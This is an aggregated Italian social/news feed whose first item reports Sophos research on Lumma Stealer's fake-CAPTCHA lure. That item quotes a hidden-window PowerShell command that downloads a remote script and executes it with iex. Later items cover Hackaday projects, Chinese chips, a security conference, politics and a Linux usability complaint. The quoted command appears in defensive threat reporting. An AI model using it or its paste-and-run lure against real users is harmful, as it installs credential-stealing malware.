Salta al contenuto principale



Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile


Lumma Stealer è un noto malware specializzato nel furto di informazioni, attivo sin dalla metà del 2022. Negli ultimi mesi ha mostrato un’evoluzione significativa nelle sue modalità operative, adottando nuove tattiche, tecniche e procedure. Questa minaccia è sempre più presente nei report relativi agli incidenti di sicurezza informatica: solo nell’ultimo anno, sono state registrate migliaia di compromissioni attribuite al malware.

Si ritiene che abbia origini nell’ambiente cybercriminale russo e venga attualmente distribuito come Malware-as-a-Service (MaaS). I suoi creatori offrono aggiornamenti frequenti e assistenza agli utenti tramite canali Telegram e una documentazione ospitata su Gitbook. L’obiettivo principale di Lumma Stealer è l’esfiltrazione di dati sensibili, come credenziali di accesso, token di sessione, wallet di criptovalute e informazioni personali raccolte dai dispositivi infetti.

Ciò che rende Lumma particolarmente pericoloso sono le sue sofisticate tecniche di distribuzione, che di recente si sono espanse fino a includere l’ingegneria sociale attraverso false domande CAPTCHA e ingannevoli richieste di download. Questi metodi sfruttano la fiducia degli utenti nei processi di verifica di sicurezza più noti , inducendo le vittime a eseguire comandi dannosi sui propri sistemi.

I ricercatori di Sophos hanno identificato diverse campagne Lumma Stealer durante l’autunno e l’inverno 2024-25, documentando come le tattiche del malware si sono evolute per eludere il rilevamento. “Le variazioni che abbiamo riscontrato nel comportamento di Lumma Stealer sono significative per i difensori”, ha osservato il team Sophos Managed Detection and Response nel suo report, sottolineando che queste tecniche di distribuzione potrebbero essere facilmente adattate ad altri malware oltre a Lumma Stealer.

Un’innovazione particolarmente preoccupante riguarda l’abuso di Windows PowerShell attraverso pagine di verifica CAPTCHA ingannevoli.
Una casella di verifica dall’aspetto familiare (Fonte Sophos)
In questa catena di attacchi, alle vittime che visitano siti dannosi viene presentata una richiesta di verifica standard “Non sono un robot”, creando un falso senso di sicurezza e legittimità. Dopo aver cliccato sulla casella di verifica, gli utenti vengono reindirizzati a una seconda pagina che chiede loro di caricare il comando “Esegui” di Windows, quindi premere Ctrl+V seguito da Invio.
La successiva richiesta di “controllo di sicurezza” è un po’ insolita, ma abbastanza semplice per gli utenti incauti (Fonte Sophos)
Questa azione apparentemente innocua in realtà incolla ed esegue un comando PowerShell nascosto che opera in una finestra nascosta:

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t

L’esecuzione di questo comando avvia un sofisticato processo di attacco multifase. Lo script recupera componenti malware aggiuntivi dai server di comando e controllo, scaricando, estraendo ed eseguendo il payload principale di Lumma Stealer. Una volta attivo, questo malware accede sistematicamente ai dati del browser, come evidenziato nella Figura 6, dove Autolt3.exe accede ai dati di accesso e ai cookie di Chrome.
Flusso di attacco con abuso CAPTCHA (Fonte Sophos)
Ciò che rende questo vettore di attacco particolarmente efficace è l’impiego della crittografia AES per nascondere i payload successivi. Il malware impiega sofisticate tecniche di offuscamento, tra cui l’impiego di vettori di inizializzazione e complesse routine di decrittazione, per eludere le tradizionali misure di sicurezza. Questa combinazione di ingegneria sociale e metodi tecnici avanzati rappresenta un’evoluzione significativa nelle capacità di Lumma Stealer.

Gli esperti di sicurezza raccomandano di implementare soluzioni di protezione degli endpoint robuste con funzionalità di analisi comportamentale, poiché il solo rilevamento basato sulle firme si rivela inadeguato contro queste minacce in continua evoluzione.

L'articolo Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile proviene da il blog della sicurezza informatica.



The ZX Spectrum Logic Analyzer


We know [Happy Little Diodes] frequently works with logic analyzer projects. His recent wireless logic analyzer for the ZX Spectrum is one of the oddest ones we’ve seen in a while. The heart of the system is an RP2040, and there are two boards. One board interfaces with the computer, and another hosts the controller.

The logic analyzer core is powered by a common open-source analyzer from [Eldrgusman]. This is one of the nice things about open source tools. Most people probably don’t need a logic analyzer that plugs directly into a ZX Spectrum. But if you do, it is fairly simple to repurpose a more generic piece of code and rework the hardware, if necessary.

You used to pay top dollar to get logic analyzers that “knew” about common CPUs and could capture their bus cycles, show execution, and disassemble the running code. But using a technique like this, you could easily decode any processor, even one you’ve designed yourself. All you need to do is invest the time to build it, if no one else has done it yet.

[Happy Little Diodes] is a big fan of the [Eldrgusman] design. What we would have given for a logic analyzer like this forty years ago.

youtube.com/embed/IHbIW8pi4Vo?…


hackaday.com/2025/05/12/the-zx…



Indipendenza tecnologica: La Cina Costruisce il suo Cloud solo con tecnologie domestiche


Basta Intel, AMD, NVIDIA. ora tutto è realizzato in casa come la soluzione cloud di Inspur, uno dei principali fornitori di infrastrutture server in Cina. L’azienda cinese Loongson ha annunciato un traguardo importante: più di cento prodotti diversi ora funzionano con processori LoongArch.

Progettata per rafforzare l’indipendenza tecnologica del Paese, la piattaforma LoongArch incorpora i migliori sviluppi di MIPS e RISC-V. I microcircuiti creati utilizzando questa tecnologia vengono già integrati in apparecchiature industriali, personal computer e server. Sebbene siano ancora indietro rispetto ai modelli di punta x86 e Arm, stanno rapidamente recuperando terreno.

Lo scorso autunno, le autorità cinesi hanno invitato le aziende locali a scegliere microprocessori prodotti locali, dichiarando inaffidabili quelli esteri. L’elenco attuale dei chip testati non include prodotti AMD e Intel, ma sono comparse due opzioni di uno sviluppatore nazionale.

La paranoia digitale oggi è il nuovo buon senso.

Tuttavia, anche gli utenti più convinti dell’idea di sovranità tecnologica non acquisteranno dispositivi che non supportino il software necessario. Tenendo conto di ciò, l’azienda pubblica sistematicamente un catalogo dei programmi supportati, indicando sia le soluzioni già pronte sia quelle in fase di finalizzazione.

Il nuovo catalogo di aprile è stato integrato con un sistema cloud di Inspur. La versione precedente del documento faceva riferimento alla soluzione completa di Lenovo per i data center.

La reputazione di Inspur è confermata dalla sua collaborazione con i più grandi giganti tecnologici cinesi: Alibaba e Tencent. Dopo che gli Stati Uniti hanno aggiunto l’azienda alla Entity List delle sanzioni nel 2023, la sua capacità di collaborare con partner americani è stata seriamente limitata. Tuttavia, l’azienda serve con successo un’ampia base di clienti nazionali, offrendo sia hardware sia il suo sistema operativo proprietario InCloud OS per l’implementazione di servizi cloud.

L’integrazione di InCloud OS, basata sulle fondamenta di OpenStack, rafforza significativamente la posizione di LoongArch nel segmento dei sistemi ad alto carico. Di particolare interesse è il chip a 64 core recentemente presentato, che ha la capacità di installare due di questi chip in un unico sistema.

Nel mercato interno, l’ingegno tecnologico di Loongson si confronta con gli sviluppi di Alibaba e Huawei. Tuttavia, le loro soluzioni si basano sull’architettura Arm, che nelle attuali realtà geopolitiche potrebbe rivelarsi un punto debole.

Pechino sostiene attivamente i leader tecnologici nazionali sulla scena mondiale, sfruttando la situazione di stallo commerciale con Washington per rafforzare l’immagine di partner affidabile. Questo approccio potrebbe anche aiutare Loongson ad espandere la sua presenza internazionale.

L'articolo Indipendenza tecnologica: La Cina Costruisce il suo Cloud solo con tecnologie domestiche proviene da il blog della sicurezza informatica.



RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag


Sabato 9 maggio, al Teatro Italia di Roma, si è chiusa la Red Hot Cyber Conference 2025, l’appuntamento annuale gratuito creato dalla community di RHC dedicato alla sicurezza informatica, alle tecnologie digitali emergenti, ma soprattutto ai giovani, sempre più numerosi ed appassionati ad ogni edizione e alla consapevolezza del rischio.

Massimiliano Brolli, il founder di Red Hot Cyber, ha dedicato moltissimo impegno nella creazione di questo evento e della community, per promuovere una visione etica in un mondo digitale.

Come cita il manifesto di RHC, “dalle ceneri del cyberpunk e dei vecchi gruppi hacker del passato che non si sono mai rassegnati a combattere per un mondo digitalmente più onesto e giusto, questo movimento di frontiera, vuole essere una voce fuori dal coro nel costruire dal basso un cambiamento, cercando di promuovere la cultura dell’hacking interdisciplinare, permettendo così all’Italia di incubare nuovi talenti che in futuro potranno renderci nuovamente protagonisti nella scena internazionale.

I protagonisti del panel: Ivano Gabrielli, Luigi Montuori, Paolo Galdieri e Giuseppe Corasaniti


Protagonisti del panel sono state importanti figure istituzionali, tra cui il prezioso intervento di Ivano Gabrielli, Direttore della Polizia Postale, che ha portato il suo contributo in qualità di massimo responsabile del Servizio Polizia Postale e delle Comunicazioni, con una lunga esperienza nel contrasto al cybercrime e nella protezione delle infrastrutture critiche, Luigi Montuori, Direttore Dipartimento sanità e ricerca presso il Garante per la protezione dei dati personali, l’immancabile Paolo Galdieri, avvocato penalista, Cassazionista e docente universitario di Diritto penale dell’informatica e Giuseppe Corasaniti, ex magistrato e oggi Professore di infromatica guridica ed etica digitale all’Università Mercatorum, le cui interviste esclusive, insieme a quella di Luca Piccinelli, CISO Huawei Italia, Gabriele Faggioli di Clusit e Flavia Rizza sul cyberbullismo, saranno presto disponibili sul canale YouTube di Red Hot Cyber.

Verrà anche pubblicato un video al giorno dell’evento, seguendo il programma della conferenza, insieme alla galleria fotografica di una conferenza che si conferma punto di riferimento della cybersecurity italiana e catalizzatore per le nuove generazioni.

Abbiamo infatti approfondito, con loro temi come la situazione dell’Italia in questo momento storico, del lato oscuro dell’IA, di cyber resilienza e cyber deterrenza, di transizione al Cloud, delle nuove figure emergenti con grandi capacità tecniche nelle indagini informatiche, di software spia, di attacchi APT alle telecomunicazioni ma anche di reti 5g, di Nis2, del confine invisbile tra crimine informatico e cyber terrorismo visto da un ex magistrato e molto altro ancora!

Red Hot Cyber 2025: gli interventi e i workshop


Ma sul palco del Teatro Italia, non sono mancate altre figure di spicco nel panorama della sicurezza informatica, come Aldo Di Mattia, Direttore SSE and Cybersecurity Advisor Italy & Malta che ha parlato della sfida impari tra Infrastrutture critiche e cybercriminali, Sunil Venazini, Principle Sales Engineer, che ha mostrato strategie e strumenti nell’era dell’IA tra attaccanti e difensori, il mitico Corrado Giustozzi, Founding Partner & Security Strategist, Resilience, che ha portato sul palco “La scomoda eredità della filosofia Hippie”. Ma non solo, Donato Onofri, Senior Red Team Engineer Crowdstrike ha parlato al pubblico di “The Rise of Patchless Attacks: Eccezioni Fantastiche e Dove Trovarle”, Michele Mezza, giornalista e docente della Federico II di Napoli, autore di Net War, che con il suo intervento ci ha parlato di “informazione come linguaggio della guerra ibrida”, seguiti dai ‘nostri’ Stefano Gazzella, giornalista e Data Protection Officer, con “Cani da Guardia 4.0,Informazione e Divulgazione Cyber” e Pietro Melillo, CISO di Wuerth Italia, con “Un anno di DarkLab tra Intelligence a Threat Actors e non ultimi Agostino Pellegrino, Cyber Security Expert. che con il suo speech “Phishing Avanzato, Inganno, Intelligence e Attacchi Omografici” ci ha illustrato come una Wi-Fi può venire hackerata, Roberto Camerinesi, ethical hacker e CTO di Cyber Evolution, che ha portato tra il pubblico le nuove frontiere dell’hacking satellitare con “Houston, abbiamo un problema”, ed infine il geniale e divertente Antonio Montillo, ethical hacker e ricercatore di sicurezza, con il suo immancabile cappello da “Malware Chef” che ha condiviso una delle sue migliori ricette: “Come Cucinare Una LLM Backdoor”.

Nella lunga lista poi non si possono dimenticare gli interventi di Luca Almici, CEO di Enterprise con “Log Management e Sicurezza”, Luigi Martire, Cyber Threat Intelligence Analyst di Tinexta con “Threat intelligence e attribution: aaccia agli APT”, Selene Giupponi, Manager Director Europe Resecurity, con “Le Nuove Frontiere Della CTI Nell’era Dell’intelligenza Artificiale”. Questa lunga lista non sarebbe completa senza Nicola Dalla Vecchia, Senior Solutions Engineer, con “Attacchi alle API: il bersaglio nascosto della tua infrastruttura”, Irene Sorani, esperta di sicurezza informatica con “La strada lastricata di buone intenzioni: Verso Il Disastro Perfetto”, Raniero Rapone, Cyber Security Consulting Director & CYRAA Design Lead, con “Cyber Risk: quanto pensi di conoscerlo?” Giuliano Rulli, COO Oplium Italia con Il lato oscuro del Cloud: i dati sono al sicuro?”, Diego Fasano, CEO di Ermetix con “Anatomia di un attacco Mobile: sorveglianza elettronica ed esfiltrazione dati” Dario Pasquini, Andrea Paita, Cybersecurity Services Manager con Cyber Threat Intelligence e AI: Tecnologie e Strumenti Al Servizio Del SOC”, Andrea Acito, Manging Director di Digimat con l’attualismo “Cybersecurity per le PMI: Dalla Consapevolezza alla Difesa Attiva” e Dario Pasquini, Principal Researcher at RSAC, con “Hacking back the AI hacker: defending against LLM-Driven cyberattacks”

L’inaugurazione dell’8 maggio ha coinvolto gli ospiti con i tradizionali workshop ‘hands-n’ realizzati in collaborazione con Accenture Italia, nei quali i partecipanti hanno potuto sperimentare direttamente le tecnologie con esercizi ad hoc mirati a perfezionare le competenze apprese come la creazione di un sistema IA di Visual Object Tracking, come hackerare un sito wordpress oppure entrare nel Dark Web in sicurezza. Si è dato anche spazio anche ad argomenti come il cyberbullismo con Flavia Rizza o la social engineering con la scoperta dei deepfake emergenti.

Red Hot Cyber Conference: la Capture The Flag


Lo stesso giorno è stata inaugurata la terza Capture The Flag (CTF) di Red Hot Cyber, realizzata in collaborazione con CyberSecurityUp di Fata Informatica, Hackmageddon World e la Fondazione Bruno Kessler (FBK), con le challenge relative all’ingegneria sociale. La sfida, che è stata coordinata dagli ethical hacker Antonio Montillo, Vincenzo Alonge, Andrea Tassotti, Thomas Kirschner, il collettivo hacker Hackerwood e il ricercatore di sicurezza Daniele Santoro, ha messo alla dura prova molti partecipanti.

L’obiettivo dei 111 hacker distribuiti in 32 team è stato quello di colpire le infrastrutture critiche di uno stato oltre alla presenza di una bomba da dissinescare.

I vincitori dell’edizione RHC 2025, premiati la sera del 9 maggio, dopo due giorni di straordinario impegno, sono stati gli imbattibili PizzaFeijoda, seguiti dagli emergenti Winnerz e i veterani CarbonHackers.

Ancora una volta la Capture The Flag tra sfide di social engineering, analisi e crittografia, exploit di vulnerabilità, web hacking e altro ancora si è dimostrata un modo per sviluppare le capacità di problem solving, di improvvisazione e creatività, di pensiero critico, spirito di squadra e di strategia difensiva e offensiva, ma soprattutto ad essere stata premiata sono state la tenacia e la perseveranza, doti fondamentale per un hacker, così come per chiunque lavori nel campo della cybersecurity o dell’informatica in generale, perché senza anche il talento più brillante rischierebbe di non arrivare lontano.

Un appuntamento consolidato, giunto alla sua quarta edizione


Un’esperienza da ripetere? Sì, l’esperienza della Red Hot Cyber Conference si sta consolidando come un appuntamento fisso per i partecipanti, grazie all’elevato livello dei contenuti, alla presenza di ospiti di rilievo e all’attenzione verso la formazione dei giovani talenti. L’evento, giunto alla sua quarta edizione, continua a crescere in partecipazione e qualità, proponendo workshop pratici, competizioni di hacking e conferenze con esperti e rappresentanti istituzionali, un mix che rende la conferenza di RHC un’occasione imperdibile per chiunque sia interessato alla cybersecurity, all’innovazione tecnologica e alla cultura digitale, con un programma che punta a ripetersi e migliorarsi negli anni a venire!

L'articolo RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag proviene da il blog della sicurezza informatica.



Semiconductor Simulator Lets You Play IC Designer


For circuit simulation, we have always been enthralled with the Falstad simulator which is a simple, Spice-like simulator that runs in the browser. [Brandon] has a simulator, too, but it simulates semiconductor devices. With help from [Paul Falstad], that simulator also runs in the browser.

This simulator takes a little thinking and lets you build devices as you might on an IC die. The key is to use the drop-down that initially says “Interact” to select a tool. Then, the drop-down below lets you select what you are drawing, which can be a voltage source, metal, or various materials you find in semiconductor devices, like n-type or a dielectric.

It is a bit tricky, but if you check out the examples first (like this diode), it gets easier. The main page has many examples. You can even build up entire subsystems like a ring oscillator or a DRAM cell.

Designing at this level has its own quirks. For example, in the real world, you think of resistors as something you can use with great precision, and capacitors are often “sloppy.” On an IC substrate, resistors are often the sloppy component. While capacitor values might not be exact, it is very easy to get an extremely precise ratio of two capacitors because the plate size is tightly controlled. This leads to a different mindset than you are used to when designing with discrete components.

Of course, this is just a simulation, so everything can be perfect. If, for some reason, you don’t know about the Falstad simulator, check it out now.


hackaday.com/2025/05/12/semico…



Once you're matured you will realize that silence is more powerful than proving a point.



Il Ministro Giuseppe Valditara, ha presentato oggi, nel corso della riunione del Consiglio dell’Unione europea dedicata all’Istruzione, la proposta per una raccomandazione europea che scoraggi l’uso degli smartphone in classe in tutte le scuole prima…


Liberato il soldato Edan Alexander, ma a Gaza si continua a morire


@Notizie dall'Italia e dal mondo
Il rilascio del militare israelo-statunitense è un gesto di buona volontà verso Trump. Nella Striscia però nulla cambia. L’Unicef lancia l’allarme: 71.000 bambini rischiano la malnutrizione acuta
L'articolo Liberato il soldato Edan Alexander, ma a Gaza si continua a morire



la pace si ottiene combattendo la violenza, a livello locale, da parte di ognuno si noi, non togliendo le armi. ogni piccolo gesto violento è una piccola guerra, e tanti gesti violenti sono una grande guerra. le armi sono uno strumento come un altro. non è che ferire una persona con le parole necessariamente non è uccidere.



Il PKK depone le armi e si dissolve. E’ la strada giusta la questione curda?


@Notizie dall'Italia e dal mondo
Una svolta che non scioglie i nodi della questione curda in Turchia e nella regione. Incerta la sorte del leader Ocalan in prigione da decenni. Interrogativi sul ruolo delle milizie YPG nel Rojava
L'articolo Il PKK depone le armi e si dissolve. E’ la



sappiamo per certo che le ai sono dei semplici compositori di parole. eppure le persone, che sia a livello di amicizia, oppure professionale, riescono ad apparire (e probabilmente essere) a un livello ancora più basso. macchinette non programmabili che reagiscono a stimoli in modo molto prevedibile. la base di tutto è che è sempre colpa qualsiasi cosa di qualcun altro. secondo la dottrina di alcuni telefilm del genere oltretomba è lo stesso senso di colpa a condannare le persone. e invece io penso che le brave persone, quelle "da paradiso", sono quelle dotate di coscienza, magari eccessiva, che riescono a sentirsi in colpa anche quando non hanno responsabilità. solo reazioni istintive in base a ideologie e credenze a volte vecchie di decenni se non secoli. questo è l'umanità. per chi crede alle anime ormai spesso le persone sono involucri vuoti. io invece parlo genericamente di livello di consapevolezza al di sotto del livello del rumore di qualsiasi segnale, e quindi non rilevabile. l'umanità si sta spegnendo. forse la fuori a giro ci sono già i nostri successori, forse disponibili fa qualche centinaia di migliaia di anni.

reshared this



#USA e #Israele, il cuneo di #Gaza


altrenotizie.org/primo-piano/1…


Dobbiamo riflettere bene su cosa sta succedendo.

Perché se ci siamo (giustamente) indignati quando le big tech statunitensi hanno ritirato le politiche di inclusione, perché dovremmo indignarci meno se la stessa cosa accade in casa nostra?

Quale sarà la prossima azienda a farlo?

Segno, purtroppo, che "il male" non è solo oltreoceano, c'è l'abbiamo qui accanto alla nostra porta, restiamo vigili.

startupitalia.eu/economy/sap-a…

#inclusione #bigtech #tolleranza #lgbt



900 People Are Collectively Driving an 'Internet Roadtrip' on Google Street View#News
#News


Folgiero accelera su difesa e underwater. I numeri del primo trimestre di Fincantieri

@Notizie dall'Italia e dal mondo

Nel primo trimestre del 2025 Fincantieri consolida il proprio ruolo di attore strategico per la sicurezza europea. Il gruppo guidato da Pierroberto Folgiero chiude il periodo con ricavi pari a 2,376 miliardi di euro, in crescita del 35% rispetto allo



Il formato Weimar+ prende forma. Difesa e sicurezza comune fuori dai vincoli Ue

@Notizie dall'Italia e dal mondo

I capi delle diplomazie di sei tra i maggiori Paesi europei – Francia, Germania, Italia, Polonia, Spagna e Regno Unito – insieme all’Alto rappresentante dell’Unione europea, Kaja Kallas, si sono incontrati oggi nella capitale britannica per un vertice incentrato



Republican Senator Mike Lee introduced Interstate Obscenity Definition Act (again) last week, which would criminalize porn at the federal level.#porn #mikelee #law #project2025




La sicurezza globale in salsa cinese. Cosa dice il nuovo Libro Bianco di Xi Jinping

@Notizie dall'Italia e dal mondo

Il 12 maggio 2025, l’Ufficio Informazioni del Consiglio di Stato cinese ha pubblicato il Libro Bianco sulla “Sicurezza nazionale della Cina nella nuova era”, un documento strategico che delinea le ambizioni e le direttrici della politica di difesa di



Attenzione!


La mia condòmina dell'ultimo piano sta cambiando le finstre, mi sta cadendo in testa di tutto, viti, pezzi di legno, ci manca la finestra intera e sono a posto.


#NotiziePerLaScuola
È disponibile il nuovo numero della newsletter del Ministero dell’Istruzione e del Merito.


Dal 15 al 19 maggio il #MIM sarà presente al Salone del Libro di Torino!
Nello spazio espositivo del MIM, presso il padiglione Oval, saranno realizzate attività informative per i docenti, gli studenti e le famiglie con un programma di oltre 40 eventi…
#MIM


Mappe – prima parte
freezonemagazine.com/rubriche/…
Le mappe sono in scale precise di centimetri. Le mappe segnano strade, svincoli, ponti. Le mappe hanno colori per indicare la pianura, la collina, la montagna. Le mappe sono divise in quadrati, per trovare un luogo basta incrociare le lettere con i numeri. Le mappe sono chiare, semplici, leggibili. Il mondo esterno invece è concavo, […]
L'articolo Mappe – prima parte proviene da FREE ZONE MAGAZINE
Le mappe sono in


Papa Robert Francis Prevost, un Leone antico per nuovi ponti


@Notizie dall'Italia e dal mondo
Dalla doppia cittadinanza USA-Perù alla promessa di un pontificato di dialogo e giustizia sociale, Leone XIV si presenta come un papa-ponte tra Americhe, memorie del Concilio e sfide del presente, in un Vaticano attraversato da tensioni geopolitiche, scandali e spinte riformatrici




the second #nakba is not a matter of #hostages . it's about #colonialism #apartheid #slaughter #ethniccleansing. consider the huge amount of natural #gas in the Palestinian area of that sea. THAT is one filthy reason of the #genocide . for the israeli leaders and for those who voted & back them, the hostages *must* stay in the hands of #Hamas , so that the indiscriminate #killing can go on. or the #deportation . their project is the complete erasure of the Palestinian people (since 1948).


Dunque, per oggi mi sono già preso del troll e dell'incompetente, e sono solo 10 e mezzo.

Ma sono certo che si possa fare di meglio: scatenatevi!!!

[post, ovviamente, ironico]



Sarah Seltzer – Singer Sisters
freezonemagazine.com/news/sara…
In libreria dal 16 maggio 2025 L’esordio narrativo, sorprendente ed emozionante, di una delle voci più interessanti del nuovo giornalismo culturale americano. Due generazioni di donne a confronto in un’epopea familiare e musicale fatta di passioni, scontri, bugie e segreti e di interrogativi sul ruolo dell’amore e su quello dell’arte La storia inizia a New […]
L'articolo Sarah Seltzer – Singer Sis


India-Pakistan: tregua fragile tra attacchi, mediazioni negate e censura


@Notizie dall'Italia e dal mondo
Dopo giorni di scontri armati e accuse incrociate, i due Paesi hanno annunciato un cessate il fuoco mentre restano dubbi sulle responsabilità e sulla tenuta della tregua
L'articolo India-Pakistan: tregua fragile tra attacchi, mediazioni negate e censura proviene da



Il 9 maggio di ieri e di oggi


altrenotizie.org/primo-piano/1…





Un momento del convegno "Chirologia e I Ching" svoltosi ieri a Villa Pallavicini a Milano.
Grazie a @Valter Vico per l'invito e a Shiatsu Milano Editore per l'ospitalità!

Tiziano reshared this.





Consiglio per acquisto televisore


Da un paio di giorni il mio televisore si "dimentica" la password per collegarsi al mio telefonino che uso come hot spot (in casa non ho Wi-Fi né rete cablata, faccio tutto con la connessione dati del telefonino). L'ho aperto per vedere se c'era qualche pila a bottone da cambiare ma non ne ho viste.

Io uso il televisore SOLO per vedere Netflix quindi al momento ogni volta che lo accendo devo andare in configurazione e impostare nuovamente la password, operazione resa noiosa dal fatto che ho a disposizione solo una tastiera virtuale su cui andare a cercare lettere e numeri spostandomi con i tasti freccia del telecomando.

Proprio in questi giorni alla COOP c'è un'offerta per un Saba SA32B46 a 99 euro, sul sito di Mediaworld lo vendono a 194. Mi sembra una buona occasione, a voi?

Il problema è che questo televisore non ha il Wi-Fi ma solo la presa Ethernet quindi così com'è non me ne farei assolutamente nulla.

Cosa dovrei comprare secondo voi per trasformare quella presa Ethernet in un Wi-Fi con cui collegarlo al mio telefonino in tethering?

Se ne valesse la pena potrei comprare il televisore più il "pezzo mancante".

Grazie.

reshared this

in reply to Marco

@Marco

Per adesso lascio tutto com'è, poi Apple penso al prezzo e mi vengono i brividi 😁

in reply to Max - Poliverso 🇪🇺🇮🇹

Naah, è hardware obsoleto, fuori produzione.
L'ho comperato a mia volta su ebay per pochi soldi.


Ti racconto la mia esperienza con linux e perché NON E' UN'ALTERNATIVA VALIDA (per me e altri per professionisti).


Dopo essermi riavvicinato a Linux a seguito di qualche anno di pausa, posso esprimere un parere che sarà senz'altro impopolare, severo, ma è quello che penso.

Il mio asus di tre anni fa ormai arranca con Windows 11. Un po' meglio dopo avere disattivato i servizi di indicizzazione (almeno, in questo modo, è diventato usabile).

Il fatto che stia rallentando a mio avviso è uno scandalo dopo soli 3 anni, ma mi aveva spinto a cercare alternative con Linux, con il quale il portatile, letteralmente, vola (con qualsiasi distribuzione). Questo aspetto continua a sorprendermi, anche se sapevo che sarebbe andata così resta comunque un punto a favore.

Il problema è un altro: l'insormontabile limite strutturale di semplicità di utilizzo, per un utente che non sia...non dico solo esperto, ma tanto esperto.

Finché si fa un utilizzo di base è tutto splendido e abbastanza abbordabile, ma quando cominci a fare degli utilizzi specifici, tanti auguri. Ed è per questo che la situazione è ancora più tragica nel contesto di un mondo in cui dipendiamo dagli USA per qualsiasi cosa, e purtroppo per me i sistemi GNU/Linux non sono ancora una valida alternativa per la massa.

Esempio per capirci meglio. Ho installato e provato le seguenti distribuzioni: Opensuse (LEAP, Tumbleweed), Fedora, Debian, MX Linux, Mageia, Linux Mint Debian Edition, Ufficio Zero, Xubuntu, Manjaro, Tuxedo. Se non erro sono quasi tutte distribuzioni "maggiori", o che derivano da esse. Alla fine ho scelto Mint perché è stata la distribuzione in cui più facilmente sono riuscito ad installare la maggior parte dei programmi che mi servono senza impazzire). Ma parlo solo dell'installazione!

Bene, oltre al fatto che ciascuna di questa ha comandi diversi per installare pacchetti (e già qui potremmo discutere, un utente comune non può e non deve sbattersi per capire come installare cosa gli serve). I dolori son venuti dopo l'installazione, infatti.

Visto che sono un utente un po' più evoluto della media, ho esigenze diverse: VMWare Workstation, un programma di video editing serio, ecc. (programmi per fotografia non li prendo neanche in considerazione, perché su Linux il meglio che esiste è GIMP, RawTherapee e Darktable, e per me non sono all'altezza della suite Adobe o di Luminar).

Bene, dicevamo: ecco le mie esigenze di Youtuber/Fotografo/Podcaster:

1) sviluppo foto veloce, efficiente, con funzioni AI avanzate
2) editing video semi-professionale
3) dirette su Youtube/Facebook
4) Virtualizzazione con VMWare (ho una certificazione VMWare).
5) Registrazione di podcast in modo professionale.

1: sviluppo foto. Come dicevo in altri post, purtroppo su Linux il mondo fotografico è rimasto indietro. Nei software proprietari non hai più bisogno di lavorare con maschere, maschere colore, maschere luminosità, selezioni con lazo, ecc. Sia i software di Adobe che quello di Luminar ti consentono di muovere un slider e (ad esempio) modificare tutto quello che è blu, o scurire un cielo troppo chiaro, o aumentare la luminosità soltanto degli oggetti in primo piano. Non devi selezionare nulla, è l'IA che capisce cosa è blu, cosa è lontano, che cosa è cielo, edificio, terreno.
Mi dispiace davvero, ma GIMP è ormai antico come concetto e ti impone di fare tutto questo lavoro manualmente, con livelli e altre cose tali per cui per sviluppare una foto per bene ci impieghi decine di minuti: non è pensabile per me tornare da un viaggio, sviluppare 800/1000 immagini e metterci 10 mesi. Darktable/RawTherapee funzionano anch'essi in modo "vecchio", non hanno una AI dietro.


2: Uso CapCut per editare i miei video, e non mi piace per niente perché è cinese e proprietario. Bene, mi sono detto, su Linux avrai delle alternative. Spoiler: no.
Non esiste niente che sia di utilizzo così immediato ma completo come CapCut.
Niente.
Ma, mi sono detto...ok, qui puoi fare uno sforzo. Vorrà dire che imparerai ad usare qualcosa di diverso. Vorrà dire che tribolerai un po' di più e che nei tuoi video ci saranno meno cose, ma può valere la pena.
Ho provato ad installare DaVinci Resolve, che ho usato in passato ma su Windows persino l'interfaccia andava a scatti.
Buone notizie? Neanche per idea, il software si installava ma non partiva. Dopo ore di ricerche su internet ho capito quali driver nvidia servissero su Linux e come installarli, poi Resolve partiva ma ora i video importati non si vedono, rimangono completamente oscuri e il programma si pianta. Inutile dirvi che con gli stessi video su Windows funziona tutto, al netto della pachidermica interfaccia.
Pazienza, mi son detto, userò KDEnlive! Sì, se avesse ciò che serve. Quando provi ad utilizzarlo qua e là compaiono scritte che indicano che alcune funzioni non sono disponibili perché manca (ad esempio) il pacchetto per il riconoscimento vocale o quello per l'italiano. Sì, benissimo, ma almeno dimmi il nome pacchetti!
La voglia è quella di lasciar perdere, non si possono buttare via ore e ore in questo modo. Le ore voglio dedicarle a fare video editing e imparare quello.

3) installato OBS studio, tutto fantastico ma non c'è modo di fargli prendere l'audio della mia scheda audio behringer 404HD (ovviamente, è selezionata e aggiunta alla scena, ma è muta). Anche qui, non ho tutte queste ore per cercare sui forum la potenziale causa. Se apro banalmente audacity funziona, su OBS no.

4) VMware Workstation sono riuscito a farlo funzionare solo su MX Linux e Mint. bastava installare il pacchetto gcc e i sorgenti del kernel. Questa cosa la sapevo perché avendo la certificazione l'avevo trovata nei testi di studio. Per le altre distro...boh, come si chiameranno i pacchetti? Chi lo sa? Anche cercando, ho fatto molta fatica a trovare queste informazioni e in ogni caso l'installazione di VMWare Workstation non andava comunque a buon fine.

5) Podcast. Buone notizie, uso già reaper! Peccato che i plugin VST che uso non vengano visti da Reaper su Linux. Di nuovo, non ho voglia di capire perché. Nei log vedo che reaper se li aspetta in un certo percorso, ma anche mettendoli lì o facendo un link simbolico non li vede.

Basta. Basta così.

La cosa che fa più incazzare è che Reaper, Reaper, OBS e KDEnlive su Windows vanno benissimo al primo colpo, Out of the box, così come VMWare Workstation, ma il punto è che i primi 4 sono open source, mi aspetterei che fosse più semplice usarli su Linux, e invece no. Ecco cosa mi fa pensare.

Certo, dipenderà anche dalle aziende che fanno software, ad es. Da Vinci Resolve potrebbe prevedere un pacchetto per distribuzioni debian-like già completo e funzionante, ma il punto è un altro: può un utente sbattersi in questo modo?

A mio avviso no, e finché Il mondo Linux non risolve questo problema, un uso professionale lo vedo davvero difficile.

Qualcuno di voi lettori starà già pensando che il problema è mio, che sono io che non so come funzionano le cose, cosa devo installare, e quindi dovrei mettermi a studiare prima di criticare.

Per me, no. Un utente qualsiasi non può sbattersi in questo modo.

